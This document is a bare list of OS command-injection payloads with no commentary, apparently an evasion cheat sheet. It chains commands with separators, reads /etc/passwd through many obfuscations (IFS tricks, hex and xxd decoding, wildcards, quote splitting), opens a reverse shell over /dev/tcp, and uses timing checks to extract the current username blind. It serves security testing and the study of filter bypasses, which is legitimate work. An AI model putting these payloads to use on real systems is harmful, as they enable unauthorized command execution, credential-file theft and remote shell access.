;ls
;dir
| ls
| dir
&& ls
&& dir
; cat /etc/passwd
/Www$ cat</etc/passwd
{cat,/etc/passwd}
cat$IFS/etc/passwd
echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
X=$'uname\x20-a'&&$X
sh</dev/tcp/127.0.0.1/4242
IFS=,;`cat<<<uname,-a`
;ls%09-al%09/home
ping%CommonProgramFiles:~10,-18%IP
ping%PROGRAMFILES:~10,-5%IP
;cat>/tmp/hi<<EOF%0ahello%0aEOF
;cat</tmp/hi
cat%20/et%5C%0Ac/pa%5C%0Asswd
echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
cat `echo -e "\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"`
abc=$'\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64';cat $abc
`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`
xxd -r -p <<< 2f6574632f706173737764
cat `xxd -r -p <<< 2f6574632f706173737764`
xxd -r -ps <(echo 2f6574632f706173737764)
cat `xxd -r -ps <(echo 2f6574632f706173737764)`
echo ${HOME:0:1}
cat ${HOME:0:1}etc${HOME:0:1}passwd
echo . | tr '!-0' '"-1'
tr '!-0' '"-1' <<< .
cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd
w'h'o'am'i
w"h"o"am"i
w\ho\am\i
/\b\i\n/////s\h
who$@ami
echo $0
-> /usr/bin/zsh
echo whoami|$0
who$()ami
who$(echo am)i
who`echo am`i
/???/??t /???/p??s??
test=/ehhh/hmtc/pahhh/hmsswd
cat ${test//hhh\/hm/}
cat ${test//hh??hm/}
g="/e"\h"hh"/hm"t"c/\i"sh"hh/hmsu\e;tac$@<${g//hh??hm/}
time if [ $(whoami|cut -c 1) == s ]; then sleep 5; fi
time if [ $(whoami|cut -c 1) == a ]; then sleep 5; fi
